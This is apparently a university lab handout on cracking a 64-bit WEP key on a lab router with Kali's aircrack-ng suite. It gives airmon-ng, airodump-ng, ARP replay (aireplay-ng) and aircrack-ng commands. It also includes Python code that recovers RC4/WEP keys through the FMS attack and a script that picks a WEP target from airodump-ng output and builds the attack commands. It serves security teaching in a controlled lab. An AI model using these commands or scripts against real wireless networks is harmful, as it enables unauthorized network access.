Project 22: Cracking WEP with Kali in S214 (20 pts.)

What You Need for This Project

Set up a WEP-Protected Wireless LAN

You need these three devices, set up as shown below.

Attacker: A computer with an appropriate wireless NIC booted to Kali Linux (detailed instructions below).

Router: Use any wireless router that is available. Connect a cable from any numbered port on the router to any PC, and disable all other network adapters on the PC. Use IPCONFIG to find the Default Gateway on the PC and open that address in a Web browser. Configure the network to use 64-bit WEP (some routers call it 40-bit or "WEP-64"), and make a note of the key, which is ten hexadecimal characters. The key length matters later: the aircrack-ng command at the end of this project is told to look for a 64-bit key.

Wireless Client: Use any computer with a wireless card. Connect to the wireless router, typing in the ten-character key when you are prompted to. Disable all other network adapters on the wireless client computer. On the wireless client, enter this command to send a constant series of pings to the router, using your router's IP address instead of the example address below:

ping -t 192.168.10.1

Booting the Attacker PC to Kali Linux

Use a computer labelled "W" in S214.

Insert the Kali Boot DVD.

Power the machine off.

Power the machine on again, and tap the F9 key to bring up the boot menu. Ensure that CD-ROM is highlighted and press Enter.

Accept the default boot option for Kali Linux.

Log in as root with the password toor

Open a Terminal window.

Observing the wlan0 Device

In the Terminal window, type in this command, and then press the Enter key:
iwconfig
You should see the wlan0 device, as shown below on this page. It is in Mode:Managed, which is the normal mode for wireless networking. We need to get the card out of that mode, so we will first disable it.

In the Terminal window, type in this command, and then press the Enter key:

ifconfig wlan0 down

Starting the wifi0 Device in Monitor Mode

In the Terminal window, type in these commands, pressing the Enter key after each one:
airmon-ng check

airmon-ng check kill

airmon-ng start wifi0

The first two commands list, and then kill, processes (such as network managers) that would otherwise keep changing the card's channel or mode. The third puts the card into monitor mode. wifi0 is the parent device that the MadWiFi (Atheros) driver creates, which is why it is used here; in monitor mode the card passes up every frame it hears rather than only frames addressed to it, and both the capture and the packet injection below depend on that. If iwconfig showed wlan0 and there is no wifi0 device, run airmon-ng start wlan0 instead, and use the monitor interface name that airmon-ng reports (typically mon0 on this Kali release) wherever wlan0 appears in the commands below. Until it is given a channel, the monitor interface hops across all channels.

Capturing Packets to View the Available Networks

In the Terminal window, press Shift+Ctrl+N. This opens a new Konsole tab, labeled "Shell No. 2" at the bottom of the window.

In the "Shell No. 2" window, type in this command, and then press the Enter key:

airodump-ng -w test -t wep wlan0
This fills the tab with a live list of the WEP-protected networks in range, as shown below on this page. (My image showed the non-WEP networks too.) The -w test option also writes the captured packets to files named test-01.cap and so on; those files are not needed for this project.

The columns in the output are explained below:

BSSID: the MAC address of the access point.
PWR: signal level; values closer to zero are stronger.
Beacons: the number of beacon (announcement) frames heard from the access point.
#Data: the number of data frames captured; for WEP networks this is the count of unique IVs, which is the number the cracking step depends on.
CH: the channel the access point is using.
ENC: the encryption in use; only WEP networks appear here because of the -t wep filter.
ESSID: the network name.

You need four items from this screen, as highlighted in the figure above. Write down these three values from the upper (access point) section for the network you want to crack: the BSSID, the CH, and the ESSID.

In the lower section of your screen, find the STATION address that is associated with the access point you want to crack--the BSSID you noted earlier. This is the MAC address of the wireless client, and it is the fourth item.

Press Ctrl+C to stop the Airodump capture.

Restarting Monitoring on the Correct Channel

In the Terminal window (the first tab, where you ran airmon-ng), stop the monitor-mode interface:

airmon-ng stop wifi0
Then type in this command, and press the Enter key:
airmon-ng start wifi0 11
Replace 11 with the CH number you wrote down in a previous step. (If you started wlan0 instead of wifi0 earlier, use the same name here.) Now the card listens only on the channel we are interested in instead of hopping, which is what the packet injection below requires.

Resuming Packet Capture

In the "Shell No. 2" window, type in this command, and then press the Enter key:
airodump-ng -c 11 -w output -t wep wlan0
Replace 11 with the CH number you noted earlier.

This captures packets on the desired channel and writes them to output-01.cap (airodump-ng appends a sequence number to the prefix given with -w; the aircrack-ng command later uses output*.cap to match it). Notice that #Data is not rising quickly - you may not even see any data being captured at all. Only real traffic from the client (the pings you started) produces WEP data frames, and a ping a second is far too slow.

Leave this capture running.

Performing an ARP Replay Attack

Now we will capture an ARP request from the wireless client and replay it to the access point. The access point relays every frame it accepts from an associated station, and each relayed copy is encrypted with a fresh IV, so replaying the same ARP request over and over forces the access point to pump out a lot of IVs. That is why the -h option below must be the MAC address of a client that is really associated: the access point drops frames from unknown stations.

In the first Terminal tab (the one where you ran airmon-ng), type in this command, and then press the Enter key:

aireplay-ng -3 -b 00:11:50:1E:43:87 -h 00:16:B6:5B:A3:D6 wlan0
Replace 00:11:50:1E:43:87 with the BSSID you wrote down in a previous step (the access point's MAC address).

Replace 00:16:B6:5B:A3:D6 with the STATION address you wrote down in a previous step (the wireless client's MAC address).

(The image below was taken with a different network adapter named rausb0, but now we are using the wlan0 adapter.)

aireplay-ng is waiting for an ARP packet. Disconnect the wireless client and reconnect it to create an ARP request. The "got N ARP requests" counter in the aireplay-ng output should go to 1 or more, and from then on aireplay-ng retransmits that frame continuously.

Look at the "Shell No. 2" tab, where airodump-ng is still running. You usually need at least 50000 Data packets (unique IVs) to crack a WEP key.

The #Data value should be rising very rapidly, as shown below on this page.

That means the ARP replay attack is successfully pumping IV values out of the access point, gathering data that can be used to crack the WEP encryption quickly.
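Why collecting IVs breaks the key: WEP encrypts each frame with RC4 keyed by the 24-bit IV followed by the secret key, and for certain IVs the first keystream byte reveals one key byte with roughly 5 percent probability (the Fluhrer-Mantin-Shamir weakness that the WEP attacks in aircrack-ng build on). The first plaintext byte of every frame is known anyway, because every 802.11 data payload starts with the LLC/SNAP header AA AA 03. The Python below is an added example written for this page; it is not part of the original project or of the aircrack-ng suite. It simulates an access point encrypting ARP frames under a constructed 40-bit key, then recovers that key by tallying the FMS guess from each frame carrying a classic weak IV of the form (A+3, 255, X), trying several candidates per key byte and verifying complete keys against a captured frame, which is the role of aircrack-ng's fudge factor (-f). The key, the IV set, the frame contents and the function names are all constructed for the example; a real capture also carries the CRC-32 ICV, and needs many more frames because the access point, not the attacker, chooses which IVs appear.

```python
from collections import Counter

# Every 802.11 data payload starts with this LLC/SNAP header, so the first plaintext
# byte of any WEP frame is known to be 0xAA; FMS needs exactly one known keystream byte.
SNAP = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00])
# Constructed ARP request header that follows SNAP (EtherType 0806, htype 1, ptype 0800,
# hlen 6, plen 4, opcode 1). Only the first byte of the frame matters to the attack.
ARP_HDR = bytes.fromhex("08060001080006040001")


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling (KSA), then n bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_crypt(secret: bytes, iv: bytes, data: bytes) -> bytes:
    """WEP keys RC4 with IV || secret. XOR is its own inverse (ICV omitted here)."""
    ks = rc4_keystream(iv + secret, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))


def capture_weak_iv_frames(secret: bytes, key_len: int = 5):
    """Constructed traffic: one encrypted ARP frame per classic weak IV (A+3, 255, X)."""
    frames = []
    for a in range(key_len):
        for x in range(256):
            iv = bytes([a + 3, 0xFF, x])
            frames.append((iv, wep_crypt(secret, iv, SNAP + ARP_HDR)))
    return frames


def partial_ksa(iv: bytes, known: bytes):
    """Run only the KSA steps whose key bytes the attacker knows: the IV plus recovered bytes."""
    K = iv + known
    S = list(range(256))
    j = 0
    for i in range(len(K)):
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def vote(frames, known: bytes) -> Counter:
    """FMS tally of guesses for secret key byte number len(known)."""
    idx = len(known) + 3                # position of that byte in IV || secret
    votes = Counter()
    for iv, ct in frames:
        S, j = partial_ksa(iv, known)
        # "Resolved" state: the first PRGA byte will be S[idx] unless later KSA steps disturb
        # positions 1, S[1] or idx, which they leave alone with probability about e^-3.
        if S[1] >= idx or (S[1] + S[S[1]]) & 0xFF != idx:
            continue
        z = ct[0] ^ SNAP[0]             # first keystream byte, from the known plaintext
        # At KSA step idx, j advances by S[idx] + K[idx] and S[idx] takes the value found at
        # the new j. If z survived, the new j is wherever z sits now, which pins K[idx].
        votes[(S.index(z) - j - S[idx]) & 0xFF] += 1
    return votes


def key_is_right(secret: bytes, frames) -> bool:
    """Decrypt one captured frame and check that the SNAP header reappears."""
    iv, ct = frames[0]
    return wep_crypt(secret, iv, ct[:len(SNAP)]) == SNAP


def recover_key(frames, key_len: int = 5, fudge: int = 8):
    """Depth-first over the top-`fudge` candidates per byte, verifying complete keys."""
    def search(known: bytes):
        if len(known) == key_len:
            return known if key_is_right(known, frames) else None
        for cand, _ in vote(frames, known).most_common(fudge):
            found = search(known + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")


if __name__ == "__main__":
    secret = bytes.fromhex("0123456789")        # constructed 40-bit WEP key
    frames = capture_weak_iv_frames(secret)
    found = recover_key(frames)
    print("recovered key:", found.hex() if found else "not found")
```

Each weak-IV frame votes for the right byte only about one time in twenty, so the vote for a byte is a small majority over noise, and a wrong byte early in the key makes every later vote meaningless; that is why the search keeps several candidates per position and confirms a key only when it decrypts a real frame. aircrack-ng's default PTW attack uses a stronger statistic and therefore needs far fewer IVs than the FMS tally shown here, but the reason the ARP replay helps is the same: every relayed frame is one more IV to vote with.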

Troubleshooting

If aireplay-ng stalls at "Waiting for beacon frame" and never finds one, first make sure the monitor interface is locked to the access point's channel. If you added -e with the ESSID to the aireplay-ng command, retype the ESSID by hand exactly as airodump-ng displays it (ESSIDs are case-sensitive), and avoid copy-and-paste, which can pick up stray characters.

Another option is to add the -D flag to the aireplay-ng command, which disables access-point detection so it does not wait for a beacon.

If the ARP replay still fails, you can just make the network busier. One simple way to do that is to open 30 Command Prompt windows on the client, each running this command, using your router's IP address instead of the example address below:
ping -t -l 65000 192.168.10.1
The 65000-byte payload is split into many fragments, so each ping sends dozens of data frames. They won't get replies, but they should send a lot of packets to the router and make the #Data count increase rapidly.

Cracking the Key

In the Terminal window, press Shift+Ctrl+N. This opens a new Konsole tab, labeled "Shell No. 3" at the bottom of the window. In the "Shell No. 3" window, type in this command, and then press the Enter key:
aircrack-ng -a 1 -n 64 output*.cap
If a list of networks appears, find your network and type in its number, followed by the Enter key. (Adding -b with the access point's BSSID to the command skips this prompt.)

It should find the key within a few minutes, as shown below on this page. If it reports "Failed. Next try with N IVs", leave it running: aircrack-ng rereads the growing capture file and tries again as more IVs arrive.
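The values you wrote down by hand in this project (BSSID, channel, ESSID and the client's STATION address) are also in the CSV file that airodump-ng writes next to its .cap file, so the later commands can be generated instead of retyped. The Python below is an added example for this page, not code from the project or from aircrack-ng: it parses a constructed sample in the layout airodump-ng writes to output-01.csv (an access-point table, a blank line, then a station table), picks the WEP network that has an associated client, and builds the airmon-ng, airodump-ng, aireplay-ng and aircrack-ng command lines used above. The sample addresses and times are made up; the --bssid filter on airodump-ng and the -b option on aircrack-ng are real options that narrow each tool to the target, and are additions to the commands shown on this page.

```python
import csv
import re
from io import StringIO

MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)

# Constructed sample in the shape of an airodump-ng <prefix>-01.csv file. The header
# names are the ones airodump-ng writes; every value below is made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:50:1E:43:87, 2014-12-02 13:40:11, 2014-12-02 13:45:02, 11,  54, WEP , WEP,    , -40,      120,     3412,   0.  0.  0.  0,   6, labnet,
00:1A:70:3C:9D:10, 2014-12-02 13:40:12, 2014-12-02 13:45:01,  6,  54, WPA2, CCMP, PSK, -61,      110,        0,   0.  0.  0.  0,   8, neighbor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:16:B6:5B:A3:D6, 2014-12-02 13:40:30, 2014-12-02 13:45:02, -50,     3300, 00:11:50:1E:43:87,
00:21:6A:77:0B:C2, 2014-12-02 13:41:00, 2014-12-02 13:44:58, -70,       12, (not associated), neighbor
"""


def parse_airodump_csv(text: str):
    """Split the CSV into access-point and station rows, each a dict keyed by header name."""
    aps, stations = [], []
    header, table = None, None
    for row in csv.reader(StringIO(text)):
        cells = [c.strip() for c in row]        # airodump-ng pads every field with spaces
        if not any(cells):
            table = None                        # a blank line ends the current table
            continue
        if cells[0] == "BSSID":
            header, table = cells, aps
            continue
        if cells[0] == "Station MAC":
            header, table = cells, stations
            continue
        if table is not None and header:
            table.append(dict(zip(header, cells)))
    return aps, stations


def pick_wep_target(aps, stations, essid=None):
    """Return BSSID, channel, ESSID and one associated client for a WEP network, or None."""
    for ap in aps:
        if not ap["Privacy"].startswith("WEP"):
            continue
        if essid is not None and ap["ESSID"] != essid:
            continue
        clients = [s["Station MAC"] for s in stations if s["BSSID"] == ap["BSSID"]]
        if not clients:
            continue                            # the ARP replay needs a client MAC for -h
        return {"bssid": ap["BSSID"], "channel": int(ap["channel"]),
                "essid": ap["ESSID"], "client": clients[0]}
    return None


def build_commands(target, iface="wlan0", mon_iface=None, prefix="output"):
    """Command lines for the channel lock, capture, ARP replay and crack steps."""
    for mac in (target["bssid"], target["client"]):
        if not MAC_RE.match(mac):
            raise ValueError("not a MAC address: %r" % mac)
    mon = mon_iface or iface                    # use mon0 here if airmon-ng created one
    ch = target["channel"]
    return [
        "airmon-ng start %s %d" % (iface, ch),
        "airodump-ng -c %d --bssid %s -w %s %s" % (ch, target["bssid"], prefix, mon),
        "aireplay-ng -3 -b %s -h %s %s" % (target["bssid"], target["client"], mon),
        "aircrack-ng -a 1 -n 64 -b %s %s*.cap" % (target["bssid"], prefix),
    ]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = pick_wep_target(aps, stations)
    for line in build_commands(target):
        print(line)
```

airodump-ng does not quote the ESSID field, so a network name containing a comma shifts the columns of its row; check the parsed ESSID against the airodump-ng screen before trusting the generated commands. The channel lock in the first command must be applied before the capture and replay commands, exactly as in the steps above, or aireplay-ng will not see the access point's beacons.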

Sending in the Image

The easiest way to capture this image is to take a photo of it with your cell phone.

Send the message to cnit.123@gmail.com with a subject line of Proj 22 From Your Name(s). If you are working in a group, list all the names in the subject line. Send a Cc to yourself.

If you don't have a cell phone that can take a photo, capture a snapshot on the Kali machine with Start, KSnapshot. Then send the email from the Kali machine using Iceweasel.

Returning the Equipment

Return the Kali Boot DVD, the router, and the cables to the lab monitor.

Credits

I got a lot of this from "Wireless Vulnerabilities and Cracking with the Aircrack Suite", by Stephen Argent, in the magazine hakin9, Issue 1/2008. There is a lot more information about cracking WEP and WPA in that article, it's great!

Last modified 12-2-14 2:01 pm by Sam Bowne